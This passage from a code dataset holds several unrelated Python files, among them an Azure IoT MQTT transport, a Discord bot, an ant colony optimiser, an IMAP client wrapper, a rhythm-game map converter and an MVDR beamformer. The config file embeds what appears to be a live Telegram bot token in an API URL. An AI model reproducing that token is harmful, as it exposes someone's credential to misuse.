logger.info(\"disconnect called\")\n self._disconnect_callback = callback\n self._trig_disconnect()\n\n def send_event(self, message, callback=None):\n \"\"\"\n Send a telemetry message to the service.\n\n :param callback: callback which is called when the message publish has been acknowledged by the service.\n \"\"\"\n action = SendMessageAction(message, callback)\n self._trig_add_action_to_pending_queue(action, self._pending_action_queue)\n\n def send_output_event(self, message, callback=None):\n \"\"\"\n Send an output message to the service.\n\n :param callback: callback which is called when the message publish has been acknowledged by the service.\n \"\"\"\n action = SendMessageAction(message, callback)\n self._trig_add_action_to_pending_queue(action, self._pending_action_queue)\n\n def _on_shared_access_string_updated(self):\n \"\"\"\n Callback which is called by the authentication provider when the shared access string has been updated.\n \"\"\"\n self._trig_on_shared_access_string_updated()\n\n def enable_feature(self, feature_name, callback=None, qos=1):\n \"\"\"\n Enable the given feature by subscribing to the appropriate topics.\n\n :param feature_name: one of the feature name constants from constant.py\n :param callback: callback which is called when the feature is enabled\n \"\"\"\n logger.info(\"enable_feature %s called\", feature_name)\n if feature_name == constant.INPUT_MSG:\n self._enable_input_messages(callback, qos)\n elif feature_name == constant.C2D_MSG:\n self._enable_c2d_messages(callback, qos)\n else:\n logger.error(\"Feature name {} is unknown\".format(feature_name))\n raise ValueError(\"Invalid feature name\")\n\n def disable_feature(self, feature_name, callback=None):\n \"\"\"\n Disable the given feature by subscribing to the appropriate topics.\n :param callback: callback which is called when the feature is disabled\n\n :param feature_name: one of the feature name constants from constant.py\n \"\"\"\n logger.info(\"disable_feature %s called\", feature_name)\n if feature_name == constant.INPUT_MSG:\n self._disable_input_messages(callback)\n elif feature_name == constant.C2D_MSG:\n self._disable_c2d_messages(callback)\n else:\n logger.error(\"Feature name {} is unknown\".format(feature_name))\n raise ValueError(\"Invalid feature name\")\n\n def _enable_input_messages(self, callback=None, qos=1):\n \"\"\"\n Helper function to enable input messages\n\n :param callback: callback which is called when the feature is enabled\n \"\"\"\n action = SubscribeAction(self._get_input_topic_for_subscribe(), qos, callback)\n self._trig_add_action_to_pending_queue(action)\n self.feature_enabled[constant.INPUT_MSG] = True\n\n def _disable_input_messages(self, callback=None):\n \"\"\"\n Helper function to disable input messages\n\n :param callback: callback which is called when the feature is disabled\n \"\"\"\n action = UnsubscribeAction(self._get_input_topic_for_subscribe(), callback)\n self._trig_add_action_to_pending_queue(action)\n self.feature_enabled[constant.INPUT_MSG] = False\n\n def _enable_c2d_messages(self, callback=None, qos=1):\n \"\"\"\n Helper function to enable c2de messages\n\n :param callback: callback which is called when the feature is enabled\n \"\"\"\n action = SubscribeAction(self._get_c2d_topic_for_subscribe(), qos, callback)\n self._trig_add_action_to_pending_queue(action)\n self.feature_enabled[constant.C2D_MSG] = True\n\n def _disable_c2d_messages(self, callback=None):\n \"\"\"\n Helper function to disabled c2d messages\n\n :param callback: callback which is called when the feature is disabled\n \"\"\"\n action = UnsubscribeAction(self._get_c2d_topic_for_subscribe(), callback)\n self._trig_add_action_to_pending_queue(action)\n self.feature_enabled[constant.C2D_MSG] = False\n\n\ndef _is_c2d_topic(split_topic_str):\n \"\"\"\n Topics for c2d message are of the following format:\n devices//messages/devicebound\n :param split_topic_str: The already split received topic string\n \"\"\"\n if \"messages/devicebound\" in split_topic_str and len(split_topic_str) > 4:\n return True\n return False\n\n\ndef _is_input_topic(split_topic_str):\n \"\"\"\n Topics for inputs are of the following format:\n devices//modules//messages/inputs/\n :param split_topic_str: The already split received topic string\n \"\"\"\n if \"inputs\" in split_topic_str and len(split_topic_str) > 6:\n return True\n return False\n\n\ndef _extract_properties(properties, message_received):\n \"\"\"\n Extract key=value pairs from custom properties and set the properties on the received message.\n :param properties: The properties string which is ampersand(&) delimited key=value pair.\n :param message_received: The message received with the payload in bytes\n \"\"\"\n key_value_pairs = properties.split(\"&\")\n\n for entry in key_value_pairs:\n pair = entry.split(\"=\")\n key = urllib.parse.unquote_plus(pair[0])\n value = urllib.parse.unquote_plus(pair[1])\n\n if key == \"$.mid\":\n message_received.message_id = value\n elif key == \"$.cid\":\n message_received.correlation_id = value\n elif key == \"$.uid\":\n message_received.user_id = value\n elif key == \"$.to\":\n message_received.to = value\n elif key == \"$.ct\":\n message_received.content_type = value\n elif key == \"$.ce\":\n message_received.content_encoding = value\n else:\n message_received.custom_properties[key] = value\n\n\ndef _encode_properties(message_to_send, topic):\n \"\"\"\n uri-encode the system properties of a message as key-value pairs on the topic with defined keys.\n Additionally if the message has user defined properties, the property keys and values shall be\n uri-encoded and appended at the end of the above topic with the following convention:\n '=&=&=(...)'\n :param message_to_send: The message to send\n :param topic: The topic which has not been encoded yet. For a device it looks like\n \"devices//messages/events/\" and for a module it looks like\n \"devices///messages/events/\n :return: The topic which has been uri-encoded\n \"\"\"\n system_properties = {}\n if message_to_send.output_name:\n system_properties[\"$.on\"] = message_to_send.output_name\n if message_to_send.message_id:\n system_properties[\"$.mid\"] = message_to_send.message_id\n\n if message_to_send.correlation_id:\n system_properties[\"$.cid\"] = message_to_send.correlation_id\n\n if message_to_send.user_id:\n system_properties[\"$.uid\"] = message_to_send.user_id\n\n if message_to_send.to:\n system_properties[\"$.to\"] = message_to_send.to\n\n if message_to_send.content_type:\n system_properties[\"$.ct\"] = message_to_send.content_type\n\n if message_to_send.content_encoding:\n system_properties[\"$.ce\"] = message_to_send.content_encoding\n\n if message_to_send.expiry_time_utc:\n system_properties[\"$.exp\"] = (\n message_to_send.expiry_time_utc.isoformat()\n if isinstance(message_to_send.expiry_time_utc, date)\n else message_to_send.expiry_time_utc\n )\n\n system_properties_encoded = urllib.parse.urlencode(system_properties)\n topic += system_properties_encoded\n\n if message_to_send.custom_properties and len(message_to_send.custom_properties) > 0:\n topic += \"&\"\n user_properties_encoded = urllib.parse.urlencode(message_to_send.custom_properties)\n topic += user_properties_encoded\n\n return topic\n","sub_path":"azure-iot-hub-devicesdk/azure/iot/hub/devicesdk/transport/mqtt/mqtt_transport.py","file_name":"mqtt_transport.py","file_ext":"py","file_size_in_byte":30215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"654033386","text":"#!/usr/bin/python3\nimport discord\nimport asyncio\nfrom ..Config import discordConfig\n\nclient = discord.Client()\n\n@client.event\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n msg = '{0.author}: {0.content}'.format(message)\n await client.send_message(message.channel, msg)\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclass MsgHandler:\n send_general_message = None\n\n def __init__(self, send_general_message):\n self.send_general_message = send_general_message\n\n async def connect(self):\n await client.start(discordConfig.TOKEN)\n \n def logout(self):\n client.logout()\n\n def send_message(self, message):\n print(\"sending message to discord\")\n for channel in client.get_all_channels():\n print(channel)\n if channel.name == \"general\":\n print(\"true?\")\n print(message)\n client.send_message(channel, message)\n \n","sub_path":"ChatConnector/DiscordHandler/discordHandler.py","file_name":"discordHandler.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"65994699","text":"from heapq import heappush, heappop\nfrom itertools import count\nimport networkx as nx\n\n\n\ndef Copy_all_shortest_paths_avoidnode(G, source, target, weight=None,avoid_node=None):\n if weight is not None:\n pred,dist = copy_dijkstra_predecessor_and_distance(G,source,weight=weight,avoid_node=avoid_node)\n else:\n pred = nx.predecessor(G,source)\n if target not in pred:\n raise Exception(\"No Path found with Given Bandwidth Constraint\")\n stack = [[target,0]]\n top = 0\n while top >= 0:\n node,i = stack[top]\n if node == source:\n yield [p for p,n in reversed(stack[:top+1])]\n if len(pred[node]) > i:\n top += 1\n if top == len(stack):\n stack.append([pred[node][i],0])\n else:\n stack[top] = [pred[node][i],0]\n else:\n stack[top-1][1] += 1\n top -= 1\n\ndef copy_dijkstra_predecessor_and_distance(G, source, cutoff=None, weight='weight',avoid_node=None):\n weight = copy_weight_function(G, weight)\n pred = {source: []} # dictionary of predecessors\n return (pred, copy_dijkstra(G, source, weight, pred=pred, cutoff=cutoff,avoid_node=avoid_node))\n\ndef copy_weight_function(G, weight):\n if callable(weight):\n return weight\n # If the weight keyword argument is not callable, we assume it is a\n # string representing the edge attribute containing the weight of\n # the edge.\n if G.is_multigraph():\n return lambda u, v, d: min(attr.get(weight, 1) for attr in d.values())\n return lambda u, v, data: data.get(weight, 1)\n\ndef copy_dijkstra(G, source, weight, pred=None, paths=None, cutoff=None,target=None,avoid_node=None):\n G_succ = G.succ if G.is_directed() else G.adj\n push = heappush\n pop = heappop\n dist = {} # dictionary of final distances\n seen = {source: 0}\n # fringe is heapq with 3-tuples (distance,c,node)\n # use the count c to avoid comparing nodes (may not be able to)\n c = count()\n fringe = []\n push(fringe, (0, next(c), source))\n while fringe:\n (d, _, v) = pop(fringe)\n if v in dist:\n continue # already searched this node.\n dist[v] = d\n if v == target:\n break\n for u, e in G_succ[v].items():\n cost = weight(v, u, e)\n if cost is None:\n continue\n vu_dist = dist[v] + cost\n if cutoff is not None:\n if vu_dist > cutoff:\n continue\n if u in dist:\n if vu_dist < dist[u]:\n raise ValueError('Contradictory paths found:','negative weights?')\n elif avoid_node:\n if avoid_node != u :\n if u not in seen or vu_dist < seen[u]:\n seen[u] = vu_dist\n push(fringe, (vu_dist, next(c), u))\n if paths is not None:\n paths[u] = paths[v] + [u]\n if pred is not None:\n pred[u] = [v]\n elif vu_dist == seen[u]:\n if pred is not None:\n pred[u].append(v)\n\n\n # The optional predecessor and path dictionaries can be accessed\n # by the caller via the pred and paths objects passed as arguments.\n return dist\n","sub_path":"avoid_node.py","file_name":"avoid_node.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350293203","text":"import numpy as np\nimport multiprocessing\n\nfrom algorithm import Algorithm\n\n\nclass AntSystem(Algorithm):\n\n def __init__(self):\n self.settings_list = ['max_iterations', 'n_ants', 'pheronome_weight',\n 'heuristic_weight', 'evaporation_rate',\n 'deposit_constant']\n self.settings = {\n self.settings_list[0]: 100,\n self.settings_list[1]: 30,\n self.settings_list[2]: 1,\n self.settings_list[3]: 1,\n self.settings_list[4]: 0.1,\n self.settings_list[5]: 1,\n }\n\n def __str__(self):\n return \"Ant System\"\n\n def construct_solution(self, problem, pheromone_matrix):\n first_heuristic = problem.get_initial_candidate_list()\n first_heuristic = [pair for pair, x in first_heuristic]\n solution = problem.initial_double_assigned_solution(first_heuristic)\n while solution.count(None):\n candidate_list = []\n for candidate in problem.current_candidate_list(solution):\n element, location = candidate[0]\n heuristic = candidate[1]\n pheromone = pheromone_matrix[location,element]\n candidate_list.append(((element, location), heuristic,\n pheromone))\n visibility_dict = {}\n total_visibility = 0\n # for each position, heuristic and pheromone values\n for pair, h, ph in candidate_list:\n visibility = ((ph ** self.settings['pheronome_weight']) *\n (h ** self.settings['heuristic_weight']))\n visibility_dict[pair] = visibility\n total_visibility += visibility\n pick = np.random.uniform(0, 1)\n cumulative_proportion = 0\n for pair in visibility_dict:\n proportion = visibility_dict[pair] / total_visibility\n cumulative_proportion += proportion\n if pick <= cumulative_proportion:\n solution[pair[1]] = pair[0] + 1\n break\n return solution\n\n def update_pheromone_matrix(self, solution, cost, pheromone_matrix):\n deposit_amount = float(self.settings['deposit_constant'] / cost)\n for position, element in enumerate(solution):\n pheromone_matrix[position,element-1] += deposit_amount\n return pheromone_matrix\n\n def run(self, problem, initial_solution=None, max_avaliations=float('inf')):\n cost_history = []\n best_solution = None\n best_cost = float('inf')\n total_avaliations = 0\n n = problem.instance_size\n pheromone_matrix = np.full((n,n), 0.1)\n np.random.seed()\n ants_solutions = []\n for iteration in range(self.settings['max_iterations']):\n for ant in range(self.settings['n_ants']):\n solution = self.construct_solution(problem, pheromone_matrix)\n ants_solutions.append(solution)\n # evaporation\n pheromone_matrix *= (1 - self.settings['evaporation_rate'])\n for solution in ants_solutions:\n solution_cost = problem.evaluate(solution)\n total_avaliations += 1\n if solution_cost < best_cost:\n best_solution = solution\n best_cost = solution_cost\n pheromone_matrix = self.update_pheromone_matrix(\n solution, solution_cost, pheromone_matrix)\n if total_avaliations == max_avaliations:\n cost_history.append((iteration, best_cost))\n break\n else:\n cost_history.append((iteration, best_cost))\n continue\n break\n process = multiprocessing.current_process()\n pid = process._identity[0]\n return np.array(cost_history), best_solution, total_avaliations, pid\n","sub_path":"opt_prob_solver/ant_system2.py","file_name":"ant_system2.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358602351","text":"## importing required packages #################\nfrom imap_tools import MailBox,AND,OR,NOT\nfrom django.http import HttpResponse\nfrom imapclient import IMAPClient\nimport os\nimport math\nclass CustomMailBox():\n def __init__(self,user,pas,host='imap.gmail.com',n_per_page=40,folder='INBOX'):\n self.user=user\n self.pwd = pas\n self.host = host\n self.folder = folder\n self.n_per_page = n_per_page\n def authuser(self):\n try:\n self.Mb_main = MailBox(host=self.host)\n self.Mb_main.login(self.user,self.pwd)\n d = dict()\n for f in self.Mb_main.folder.list():\n d[f['name'].split('/')[-1]] = f['name']\n self.Mb_main.folder.set(d[self.folder])\n return d\n except:\n return False\n def getbypagenum(self,page_number,searchterm):\n d = self.authuser()\n if d:\n\n print(page_number,self.n_per_page,'ufifidh')\n mb = IMAPClient(self.host)\n mb.login(self.user,self.pwd)\n mb.select_folder(d[self.folder])\n if searchterm:\n ids= mb.search(['OR',['OR',[u'TEXT',f'{searchterm}'],['FROM',f'{searchterm}']],['OR',[u'SUBJECT',f'{searchterm}'],[u'BODY',f'{searchterm}']]])\n else:\n ids = mb.search()\n print(len(ids),'hmmm')\n last = math.ceil(len(ids)/self.n_per_page)\n print(last,'last page')\n page_number = last-page_number+1\n start = max(0,((page_number-1)*self.n_per_page))\n end = min(len(ids),(page_number*self.n_per_page))\n print(start,end)\n print(ids[start:end])\n return (next(self.Mb_main.fetch(AND(uid=f'{m}'),headers_only=True,reverse=True) )for m in reversed(ids[start:end])),last\n def getbyuid(self,uid):\n if self.authuser():\n return self.Mb_main.fetch(AND(uid=uid))\n def getbysearch(self,text):\n if self.authuser():\n return self.Mb_main.fetch(OR(subject=text))\n def get_searched_chunks(self):\n gen = self.get_searched_chunks()\n pass\n def get_info(self,folder='INBOX'):\n if self.authuser():\n return self.Mb_main.folder.status(folder)\n def get_folders(self):\n if self.authuser():\n return self.Mb_main.folder.list()\n def get_cur(self):\n if self.authuser():\n return self.Mb_main.folder.get()\n def create_folder(self,folder):\n if self.authuser():\n if self.Mb_main.folder.exists(folder):\n return 'no'\n self.Mb_main.folder.create(folder)\n return 'ok'\n def delete_folder(self,folder):\n if self.authuser():\n self.Mb_main.folder.delete(folder)\n def rename_folder(self,folder):\n d = self.authuser()\n if d:\n self.Mb_main.folder.rename(d[self.folder],folder)\n def delete_msg(self,uid):\n if self.authuser():\n self.Mb_main.delete(uid)\n def move_msgto(self,folder,uid):\n if self.authuser():\n self.Mb_main.move(uid,folder)\n def copy_msgto(self,folder,uid):\n if self.authuser():\n self.Mb_main.copy(uid,folder)\n","sub_path":"MailBox/Imap_utility.py","file_name":"Imap_utility.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403304630","text":"import json\nimport yaml\nimport os\nfrom mutagen.mp3 import MP3\nfrom shutil import copyfile\nfrom config import *\n\nDIR_LEFT = 0x01\nDIR_UP = 0x02\nDIR_DOWN = 0x04\nDIR_RIGHT = 0x08\n\nQ_LANES = [0, DIR_LEFT, DIR_UP, DIR_DOWN, DIR_RIGHT]\nI_STRINGS = [\"\", \"[Left]\", \"[Up]\", \"[Up-Left]\",\n \"[Down]\", \"[Down-Left]\", \"[Up-Down]\", \"[Up-Down-Left]\",\n \"[Right]\", \"[Right-Left]\", \"[Up-Right]\", \"[Up-Right-Left]\",\n \"[Right-Down]\", \"[Right-Down-Left]\", \"[Up-Right-Down]\", \"[Up-Right-Down-Left]\"]\n\nSONG_NAME = \"music.ogg\"\nICON_NAME = \"icon.png\"\n\ndef speed_magic(arc_cnt, length):\n # TODO better handling\n return min(arc_cnt // length + 20, 36)\n\ndef write_intra_conf(path, arcs, meta):\n conf = {}\n conf[\"configVersion\"] = 2\n conf[\"name\"] = meta['title']\n conf[\"info\"] = \"Map automatically converted from Quaver\" # TODO difficulty, length and stuff\n conf[\"levelResources\"] = [] # TODO at least simple bg\n conf[\"tags\"] = ['Other'] # TODO extract from yaml\n conf[\"handCount\"] = 1\n conf[\"moreInfoURL\"] = \"\"\n conf[\"speed\"] = speed_magic(meta[\"arccount\"], meta[\"length\"])\n conf[\"lives\"] = 50\n conf[\"maxLives\"] = conf[\"lives\"]\n conf[\"musicFile\"] = SONG_NAME\n conf[\"musicTime\"] = meta[\"length\"]\n conf[\"iconFile\"] = ICON_NAME\n conf[\"environmentType\"] = -1\n conf[\"unlockConditions\"] = []\n conf[\"hidden\"] = False\n conf[\"checkpoints\"] = []\n conf[\"events\"] = []\n for time, lane in sorted(arcs.items()):\n conf[\"events\"].append(dict(time=time / 1000, data=['SpawnObj', I_STRINGS[lane]]))\n conf[\"e\"] = \"\"\n json_data = json.dumps(conf)\n with open(path, \"wt\") as f:\n f.write(json_data)\n\n\ndef load_qua(path):\n with open(path) as f:\n y = yaml.load(f)\n\n arcs = {}\n for hitObject in y['HitObjects']:\n if 'StartTime' in hitObject:\n t = hitObject['StartTime']\n else:\n t = 0\n lane = Q_LANES[hitObject['Lane']]\n if t in arcs:\n arcs[t] = arcs[t] | lane\n else:\n arcs[t] = lane\n\n meta = {}\n meta[\"title\"] = y['Artist'] + \" - \" + y['Title'] + \" (\" + y['DifficultyName'] + \")\"\n meta[\"song\"] = y[\"AudioFile\"]\n meta[\"image\"] = y[\"BackgroundFile\"]\n meta[\"arccount\"] = len(y['HitObjects'])\n meta[\"valid\"] = (y[\"Mode\"] == \"Keys4\")\n\n return arcs, meta\n\ndef convert_folder(foldername):\n folder = os.path.join(QUAVERPATH, foldername)\n for file in os.listdir(folder):\n if file.endswith(\".qua\"):\n arcs, meta = load_qua(os.path.join(folder, file))\n h = abs(hash(frozenset(arcs.items())))\n destpath = os.path.join(INTRAPATH, str(h))\n\n if not meta[\"valid\"]:\n print(\"Skipping invalid song: \" + meta[\"title\"])\n continue\n\n try:\n os.mkdir(destpath)\n except OSError:\n pass\n meta[\"length\"] = MP3(os.path.join(folder, meta[\"song\"])).info.length\n write_intra_conf(os.path.join(destpath, \"config.txt\"), arcs, meta)\n os.system(\"ffmpeg -i \\\"\" + os.path.join(folder, meta[\"song\"]) + \"\\\" -c:a libvorbis -q:a 4 \" + os.path.join(destpath, SONG_NAME)) # TODO multiplatform\n copyfile(os.path.join(folder, meta[\"image\"]), os.path.join(destpath, ICON_NAME))\n\n# example call\nif __name__ == \"__main__\":\n convert_folder(\"972 - 403\")\n","sub_path":"qua2intra.py","file_name":"qua2intra.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310845740","text":"import numpy as np\nfrom gym import Space\n\n\ndef shape(v):\n try:\n return v.shape # NumPy arrays and PyTorch Tensors\n except AttributeError:\n return (len(v), 1)\n\n\nclass Model:\n \"\"\"\n Standard interface for models for use in the gncgym. Requires that the shape of the state, inputs (optional), and\n disturbances (optional) be specified in subclasses, along with a function to initialise/reset a model and a step\n function that returns the next state according to the inputs.\n Notation for the variables is standard:\n x: state\n u: input\n v: disturbances\n y: measurement\n \"\"\"\n\n def __init__(self, state, input_space=None, output_space=None, disturbance_space=None):\n self._input_space = None\n self._output_space = None\n self._disturbance_space = None\n self._step = None\n self._output_map = dict()\n\n def init(self, x0=None):\n raise NotImplementedError\n\n def step(self, u, v):\n if not callable(self._step):\n raise NotImplementedError\n else:\n return self._step(u, v)\n\n \"\"\"\n Mandatory properties of a model. The spaces of the inputs must be defined explicitly to\n ensure that agents and controllers can assign inputs to the model properly. Additionally,\n the output of the model code must be mapped to keys used in the namedtuple representation\n of the state. \n \"\"\"\n @property\n def input_space(self):\n if self._input_space is None or not issubclass(self._input_space, Space):\n raise NotImplementedError\n else:\n return self._input_space\n\n @property\n def disturbance_space(self):\n if self._disturbance_space is None or not issubclass(self._disturbance_space, Space):\n raise NotImplementedError\n else:\n return self._disturbance_space\n\n @property\n def output_map(self):\n if type(self._output_map) is not dict:\n raise NotImplementedError\n else:\n return self._output_map\n\n","sub_path":"src/gncgym/models/model_definitions.py","file_name":"model_definitions.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501254702","text":"import os\n\nfrom dotenv import load_dotenv\nfrom example_google_table import users\n\nload_dotenv()\n\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\")\nadmins = [\n 985485455\n]\n\n# for working notifications\napi_link = 'https://api.telegram.org/bot1267986653:AAEIxXafABfUFDDapLsEyjvNkeQ-6126q8Y'\nusers_id = users.id_and_name_of_users()\n\n\n\n\nip = os.getenv(\"ip\")\n\naiogram_redis = {\n 'host': ip,\n}\n\nredis = {\n 'address': (ip, 6379),\n 'encoding': 'utf8'\n}\n","sub_path":"data/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"468782542","text":"\r\nimport torch.nn as nn\r\nimport torch\r\nuse_cuda = torch.cuda.is_available()\r\n\r\n#state_dict = torch.load(args.model)\r\nimport torchvision.models as models\r\nmodel_path = ['../gdrive/My Drive/experiment/wideresnet.pth', '../gdrive/My Drive/experiment/resnext101.pth', '../gdrive/My Drive/experiment/densenet161.pth']\r\nnetworks = [\"wideresnet\", \"resnext\", \"densenet161\"]\r\n\r\nmodel_cache = []\r\nnum_class = 20\r\nfor i in range(len(model_path)):\r\n path = model_path[i]\r\n network = networks[i]\r\n if(network == \"densenet161\"):\r\n model = models.densenet161(pretrained=False)\r\n model.classifier = nn.Linear(2208, num_class)\r\n if(network == \"wideresnet\"):\r\n model = models.wide_resnet101_2(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n if(network == \"resnext\"):\r\n model = models.resnext101_32x8d(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n if(network == \"resnet152\"):\r\n model = models.resnet152(pretrained=False)\r\n model.fc = nn.Linear(2048, num_class)\r\n model.load_state_dict(torch.load(path))\r\n model.cuda()\r\n model.eval()\r\n\r\n model_cache.append(model)\r\nfrom data import _data_transforms\r\nfrom torchvision import datasets\r\n\r\n_, valid_transforms = _data_transforms(0)\r\ntrain_loader = torch.utils.data.DataLoader(\r\n datasets.ImageFolder('bird_dataset' + '/train_images',\r\n transform=valid_transforms),\r\n batch_size=1, shuffle=False, num_workers=1)\r\nval_loader = torch.utils.data.DataLoader(\r\n datasets.ImageFolder('bird_dataset' + '/val_images',\r\n transform=valid_transforms),\r\n batch_size=1, shuffle=False, num_workers=1)\r\n\r\nimport numpy as np\r\ndef extract_features(loader, model_cache):\r\n features = []\r\n targets = []\r\n for data, target in loader:\r\n targets.append(target.data.numpy())\r\n f = []\r\n for model in model_cache:\r\n f.append(model(data).cpu().data.numpy())\r\n f = np.array(f).flatten()\r\n features.append(f)\r\n return np.array(features), np.array(targets)\r\n\r\nf_train, t_train = extract_features(train_loader, model_cache)\r\n \r\n\r\n\r\n","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531184913","text":"f = open(\"JARGON.txt\", \"r\")\r\nwordList = f.read().split(\"\\n\")\r\nstop = \"XXX\"\r\nchoice = '' #dummy value\r\nwhile choice != stop:\r\n print(\"+++++++++++++++\\n1. Exact Match\\n2. Start of Term\\n3. Within Term\\n+++++++++++++++\")\r\n choice = input(\"Choice? \")\r\n if choice == \"1\" or choice == \"2\" or choice == \"3\":\r\n term = input(\"Term? \")\r\n if choice == \"1\":\r\n count = 0\r\n for word in wordList:\r\n if word == term:\r\n count += 1\r\n print(word)\r\n print(\"There were %d matching term(s)\" %count)\r\n print()\r\n elif choice == \"2\":\r\n count = 0\r\n for word in wordList:\r\n if word != term and word.startswith(term) == True:\r\n count += 1\r\n print(word)\r\n print(\"There were %d matching term(s)\" %count)\r\n print()\r\n elif choice == \"3\":\r\n count = 0\r\n for word in wordList:\r\n if word!= term and word.startswith(term) == False and term in word:\r\n count += 1\r\n print(word)\r\n print(\"There were %d matching term(s)\" %count)\r\n print()\r\n elif choice != stop:\r\n print(\"Invalid, try again.\")\r\n print()\r\n","sub_path":"CTRevPrac1/CTRevPrac1_Q2.py","file_name":"CTRevPrac1_Q2.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347802245","text":"#coding=utf-8\nfrom products.netReport.baseReport import BaseReport\nclass MemReport(BaseReport):\n \"\"\"\n 内存报表\n \"\"\"\n def getMemPerfValues(self):\n \"\"\"\n 得到Mem性能值\n \"\"\"\n memPerfDatas={}\n for monitorObj in self.monitorObjs:\n memPerfValue=self.getMonitorPerfDatas(monitorObj,\"Mem\",\"Mem\")\n memPerfDatas[monitorObj]=memPerfValue\n return memPerfDatas\n\n def getReport(self):\n \"\"\"\n Mem报表\n \"\"\"\n memPerfDatas=self.getMemPerfValues()\n topTenMems=self.perfTop(memPerfDatas)\n avgMemTrendValue=self.perfTrendReport(topTenMems)\n avgMemTrendLineFilePath=self.rgh.makeMemTrendGraph(avgMemTrendValue,\"内存平均利用率趋向图\",\"avgMemTrendLineFilePath\")\n [topTenMem.pop(\"datas\") for topTenMem in topTenMems]\n return topTenMems,avgMemTrendLineFilePath\n \n \n \n ","sub_path":"products/netReport/memReport.py","file_name":"memReport.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388735734","text":"url = \"http://www.pythonchallenge.com/pc/def/{}.html\"\n\noriginal = list(\"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\")\n\nfor letter in original:\n if(letter==' '):\n print(' ', end='')\n continue\n print(chr(ord(letter)+2), end=\"\")\n\nprint(\"\\nAnswer Below:\")\n\nfinal = \"\"\nnew = list(\"map\")\nfor letter in new:\n final += chr(ord(letter) + 2)\nprint(url.format(final))","sub_path":"Problem_1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274469004","text":"import itertools\nimport keras\nimport keras.backend as K\nimport math\nimport numpy as np\nimport datetime\nimport time\n\n\nclass Model:\n \"\"\"\n This class wraps the process of beamforming with MVDR and subsystemms requried for MVDR.\n It loads a model from prespecified path, uses the outputs of the model\n to determine dominant source and uses the dominant sources in updating covariance\n matrices of both noise and speech. Covariance matrix of speech is used\n to estimate direction of incidence of sound from the main source.\n \"\"\"\n\n def __init__(self, n, frame_len, delay_and_sum, use_channels, model_name, choose=None):\n self.model_path = model_name\n self.mask_thresh_speech = 0.7\n self.mask_thresh_noise = 0.3\n self.num_of_mics = len(choose) if choose else n\n self.delay_and_sum = delay_and_sum # TO DO\n self.use_channels = use_channels # TO DO\n self.frame_len = frame_len\n self.psd_tracking_constant_speech = 0.95 + 0j\n self.psd_tracking_constant_noise = 0.99 + 0j\n self.choose = choose\n self.frame = 0\n self.fft_len = int(self.frame_len / 2 + 1)\n self.eigenvector = np.ones((self.fft_len, self.num_of_mics), dtype=np.complex64) +\\\n np.zeros((self.fft_len, self.num_of_mics), dtype=np.complex64) * 1j\n self.psd_speech = np.tile(np.diag(np.ones(self.num_of_mics)), (self.fft_len, 1)).reshape(-1, self.num_of_mics, self.num_of_mics).astype(np.complex64)\n self.psd_noise = np.tile(np.diag(np.ones(self.num_of_mics)), (self.fft_len, 1)).reshape(-1, self.num_of_mics, self.num_of_mics).astype(np.complex64)\n self.frequency = 16000\n self.speed_of_sound = 340\n self.doa = np.pi/2\n self.doa_ma = 0.8\n\n def fast_mvdr(self, sound):\n cminv = np.linalg.inv(self.psd_noise)\n conj = np.conj(self.eigenvector).reshape(self.fft_len, 1, -1)\n return (conj @ cminv @ sound.reshape(self.fft_len, -1, 1)) / (\n conj @ cminv @ self.eigenvector.reshape(self.fft_len, -1, 1))\n\n def update_psds(self, fft_vector, speech_mask, noise_mask):\n toUpd = speech_mask\n self.psd_speech[toUpd] = self.psd_tracking_constant_speech * self.psd_speech[toUpd] + \\\n (1 - self.psd_tracking_constant_speech) * \\\n np.einsum('...i,...j->...ij', fft_vector, fft_vector.conj())[toUpd]\n toUpd = noise_mask\n self.psd_noise[toUpd] = self.psd_tracking_constant_noise * self.psd_noise[toUpd] + \\\n (1 - self.psd_tracking_constant_noise) * \\\n np.einsum('...i,...j->...ij', fft_vector, fft_vector.conj())[toUpd]\n\n def update_ev_by_power_iteration(self):\n unnormalized_eigenvector = np.einsum('...ij,...j->...i', self.psd_speech, self.eigenvector, dtype=np.complex128)\n eigen_norm = np.sqrt((unnormalized_eigenvector * unnormalized_eigenvector.conj()).mean(1))\n self.eigenvector = unnormalized_eigenvector / eigen_norm[:,None]\n # 